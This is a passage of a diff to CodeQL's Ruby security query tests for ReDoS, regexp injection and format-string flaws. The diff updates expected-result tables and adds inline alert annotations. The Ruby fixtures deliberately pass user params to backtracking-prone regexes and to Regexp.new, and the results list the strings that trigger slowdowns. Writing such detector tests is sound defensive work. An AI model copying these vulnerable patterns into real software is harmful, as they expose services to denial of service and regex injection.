regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | +| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | +| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | edges | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:10:5:10:8 | name | provenance | | | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:11:5:11:8 | name | provenance | | @@ -104,32 +133,3 @@ nodes | lib/index.rb:9:15:9:15 | x | semmle.label | x | | lib/index.rb:11:16:11:16 | x | semmle.label | x | subpaths -#select -| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | -| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | -| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | -| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | -| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | -| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref index 5807dc56fa07..28e7aa939063 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref @@ -1 +1,2 @@ -queries/security/cwe-1333/PolynomialReDoS.ql +query: queries/security/cwe-1333/PolynomialReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb index 2f73209321f2..117908eb881f 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb @@ -1,35 +1,35 @@ class FooController < ActionController::Base def some_request_handler # A source for the data-flow query (i.e. a remote flow source) - name = params[:name] + name = params[:name] # $ Source # A vulnerable regex regex = /^\s+|\s+$/ # Various sinks that match the source against the regex - name =~ regex # NOT GOOD - name !~ regex # NOT GOOD - name[regex] # NOT GOOD - name.gsub regex, '' # NOT GOOD - name.index regex # NOT GOOD - name.match regex # NOT GOOD - name.match? regex # NOT GOOD - name.partition regex # NOT GOOD - name.rindex regex # NOT GOOD - name.rpartition regex # NOT GOOD - name.scan regex # NOT GOOD - name.split regex # NOT GOOD - name.sub regex, '' # NOT GOOD - regex.match name # NOT GOOD - regex.match? name # NOT GOOD + name =~ regex # NOT GOOD # $ Alert + name !~ regex # NOT GOOD # $ Alert + name[regex] # NOT GOOD # $ Alert + name.gsub regex, '' # NOT GOOD # $ Alert + name.index regex # NOT GOOD # $ Alert + name.match regex # NOT GOOD # $ Alert + name.match? regex # NOT GOOD # $ Alert + name.partition regex # NOT GOOD # $ Alert + name.rindex regex # NOT GOOD # $ Alert + name.rpartition regex # NOT GOOD # $ Alert + name.scan regex # NOT GOOD # $ Alert + name.split regex # NOT GOOD # $ Alert + name.sub regex, '' # NOT GOOD # $ Alert + regex.match name # NOT GOOD # $ Alert + regex.match? name # NOT GOOD # $ Alert # Destructive variants - a = params[:b] - a.gsub! regex, '' # NOT GOOD - b = params[:a] - b.slice! regex # NOT GOOD - c = params[:c] - c.sub! regex, '' # NOT GOOD + a = params[:b] # $ Source + a.gsub! regex, '' # NOT GOOD # $ Alert + b = params[:a] # $ Source + b.slice! regex # NOT GOOD # $ Alert + c = params[:c] # $ Source + c.sub! regex, '' # NOT GOOD # $ Alert # GOOD - guarded by a string length check if name.length < 1024 @@ -39,19 +39,19 @@ def some_request_handler # GOOD - regex does not suffer from polynomial backtracking (regression test) params[:foo] =~ /\A[bc].*\Z/ - case name # NOT GOOD + case name # NOT GOOD # $ Sink when regex puts "foo" - end + end # $ Alert - case name # NOT GOOD + case name # NOT GOOD # $ Sink in /^\s+|\s+$/ then puts "foo" - end + end # $ Alert end def some_other_request_handle - name = params[:name] # source + name = params[:name] # source # $ Source indirect_use_of_reg /^\s+|\s+$/, name @@ -59,22 +59,22 @@ def some_other_request_handle end def indirect_use_of_reg (reg, input) - input.gsub reg, '' # NOT GOOD + input.gsub reg, '' # NOT GOOD # $ Alert end def as_string_indirect (reg_as_string, input) - input.match? reg_as_string, '' # NOT GOOD + input.match? reg_as_string, '' # NOT GOOD # $ Alert end def re_compile_indirect - name = params[:name] # source + name = params[:name] # source # $ Source reg = Regexp.new '^\s+|\s+$' re_compile_indirect_2 reg, name end def re_compile_indirect_2 (reg, input) - input.gsub reg, '' # NOT GOOD + input.gsub reg, '' # NOT GOOD # $ Alert end # See https://github.com/dependabot/dependabot-core/blob/37dc1767fde9b7184020763f4d0c1434f93d11d6/python/lib/dependabot/python/requirement_parser.rb#L6-L25 @@ -100,8 +100,8 @@ def re_compile_indirect_2 (reg, input) MARKER_EXPR = /(#{MARKER_EXPR_ONE}|\(\s*|\s*\)|\s+and\s+|\s+or\s+)+/ def use_marker_expr - name = params[:name] # source + name = params[:name] # source # $ Source - name =~ MARKER_EXPR + name =~ MARKER_EXPR # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb index b6bf9570f4d0..9ec0a2082d02 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb @@ -1,13 +1,13 @@ module Foo - def bar(x) + def bar(x) # $ Source # Run the /a+$/ regex on the input x. - match = x.match(/a+$/) + match = x.match(/a+$/) # $ Alert end protected - def baz(x) - match = x.match(/a+$/) + def baz(x) # $ Source + match = x.match(/a+$/) # $ Alert - match2 = x.match(/(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y$/) + match2 = x.match(/(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y$/) # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected index 13643e2c07e5..6a4c79e1fa4f 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected @@ -1,3 +1,9 @@ +#select +| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | +| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | +| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | +| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | +| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | edges | RegExpInjection.rb:4:5:4:8 | name | RegExpInjection.rb:5:13:5:21 | /#{...}/ | provenance | AdditionalTaintStep | | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:4:12:4:24 | ...[...] | provenance | | @@ -42,9 +48,3 @@ nodes | RegExpInjection.rb:55:28:55:37 | ... + ... | semmle.label | ... + ... | | RegExpInjection.rb:55:34:55:37 | name | semmle.label | name | subpaths -#select -| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | -| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | -| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | -| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | -| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref index 11c9e7230269..2623c876bf6c 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref @@ -1 +1,2 @@ -queries/security/cwe-1333/RegExpInjection.ql +query: queries/security/cwe-1333/RegExpInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb index aca47e42e60c..469c084a75b1 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb @@ -1,26 +1,26 @@ class FooController < ActionController::Base # BAD def route0 - name = params[:name] - regex = /#{name}/ + name = params[:name] # $ Source + regex = /#{name}/ # $ Alert end # BAD def route1 - name = params[:name] - regex = /foo#{name}bar/ + name = params[:name] # $ Source + regex = /foo#{name}bar/ # $ Alert end # BAD def route2 - name = params[:name] - regex = Regexp.new(name) + name = params[:name] # $ Source + regex = Regexp.new(name) # $ Alert end # BAD def route3 - name = params[:name] - regex = Regexp.new("@" + name) + name = params[:name] # $ Source + regex = Regexp.new("@" + name) # $ Alert end # GOOD - string is compared against a constant string @@ -51,7 +51,7 @@ def route7 # BAD def route8 - name = params[:name] - regex = Regexp.compile("@" + name) + name = params[:name] # $ Source + regex = Regexp.compile("@" + name) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected index 104b9d3ada07..58907596bd7d 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected @@ -1,3 +1,17 @@ +#select +| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | +| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | +| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | +| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | +| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | +| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | +| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | +| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | +| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | +| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | +| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | +| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | +| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | edges | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | provenance | | | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | provenance | | @@ -48,17 +62,3 @@ nodes | tainted_format_string.rb:42:22:42:27 | call to params | semmle.label | call to params | | tainted_format_string.rb:42:22:42:36 | ...[...] | semmle.label | ...[...] | subpaths -#select -| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | -| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | -| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | -| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | -| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | -| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | -| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | -| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | -| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | -| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | -| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log 